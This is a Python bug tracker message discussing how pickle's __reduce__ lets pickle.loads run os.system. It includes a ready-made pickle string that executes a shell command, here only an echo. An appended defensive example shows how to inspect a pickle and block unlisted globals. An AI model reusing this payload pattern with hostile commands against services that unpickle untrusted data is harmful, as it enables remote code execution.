[issue9276] pickle should support methods

Marc-Andre Lemburg report at bugs.python.org
Mon Aug 2 16:11:31 CEST 2010


Marc-Andre Lemburg <mal at egenix.com> added the comment:

M.-A. Lemburg wrote:
> Jean-Paul Calderone wrote:
>>
>> Jean-Paul Calderone <exarkun at twistedmatrix.com> added the comment:
>>
>> For example:
>>
>> exarkun at boson:~$ python
>> Python 2.6.4 (r264:75706, Dec  7 2009, 18:45:15) 
>> [GCC 4.4.1] on linux2
>> Type "help", "copyright", "credits" or "license" for more information.
>> >>> class x(object):
>> ...     def __reduce__(self):
>> ...         import os
>> ...         return os.system, ('echo "Hello from sploitland"',)
>> ... 
>> >>> import pickle
>> >>> pickle.loads(pickle.dumps(x()))
>> Hello from sploitland
>> 0
> 
> But here you are not transferring malicious code in the pickle
> string, you are just triggering the execution of such code that
> you already have (and are in control of).
> 
> Without the definition of class x on the receiving side, there
> would be no exploit.
> 
> By adding support for pickling code objects, you'd make it possible
> to place the definition of class x into the pickle string and
> you would no longer be in control of that code.

Hmm, I just tried the code and it seems that you're right:

The pickle string does not contain a reference to class x,
but only the name of the function to call. Wow, that's a huge
hole in Python's pickle system...

>>> class C(object):
...  def __reduce__(self):
...   import os
...   return os.system, ('echo "Bingo"',)
...
>>> import pickle
>>> pickle.dumps(C())
'cposix\nsystem\np0\n(S\'echo "Bingo"\'\np1\ntp2\nRp3\n.'
>>> C = None
>>> s = 'cposix\nsystem\np0\n(S\'echo "Bingo"\'\np1\ntp2\nRp3\n.'
>>> pickle.loads(s)
Bingo
0

----------

_______________________________________
Python tracker <report at bugs.python.org>
<http://bugs.python.org/issue9276>
_______________________________________
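
The observation in the message above, that the pickle string carries only the name of a function to call plus its arguments, can be checked and enforced on the loading side. The following is an added example, not part of the original message or the tracker discussion, written for Python 3; the allowlist contents and the names `named_globals`, `AllowlistUnpickler` and `safe_loads` are assumptions of this example.

```python
import io
import pickle
import pickletools

# The protocol-0 pickle string from the message above, as Python 3 bytes.
BINGO = b'cposix\nsystem\np0\n(S\'echo "Bingo"\'\np1\ntp2\nRp3\n.'

# Assumed policy for this example: the only globals a pickle may name.
ALLOWED_GLOBALS = {("builtins", "set"), ("builtins", "frozenset")}


def named_globals(data):
    """Return the (module, name) pairs a pickle asks the loader to import.

    pickletools.genops only parses opcodes; nothing in the pickle is run.
    """
    found, strings = [], []
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name in ("GLOBAL", "INST"):
            found.append(tuple(arg.split(" ", 1)))
        elif opcode.name == "STACK_GLOBAL":
            # Protocol 4+: module and name are the last two strings pushed
            # (a heuristic that holds for pickle.dumps output).
            found.append(tuple(strings[-2:]))
        elif isinstance(arg, str):
            strings.append(arg)
    return found


class AllowlistUnpickler(pickle.Unpickler):
    """Unpickler that refuses to resolve any global not on the allowlist."""

    def find_class(self, module, name):
        if (module, name) not in ALLOWED_GLOBALS:
            raise pickle.UnpicklingError(
                "global %s.%s is not allowed" % (module, name))
        return super().find_class(module, name)


def safe_loads(data):
    """Like pickle.loads, but every global lookup goes through the allowlist."""
    return AllowlistUnpickler(io.BytesIO(data)).load()


if __name__ == "__main__":
    print(named_globals(BINGO))  # what the pickle would import
    try:
        safe_loads(BINGO)
    except pickle.UnpicklingError as exc:
        print("rejected:", exc)
```

Overriding `find_class` is the mechanism the pickle documentation describes for restricting globals; it limits which callables a pickle can reach but does not make pickles from untrusted sources safe in general.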

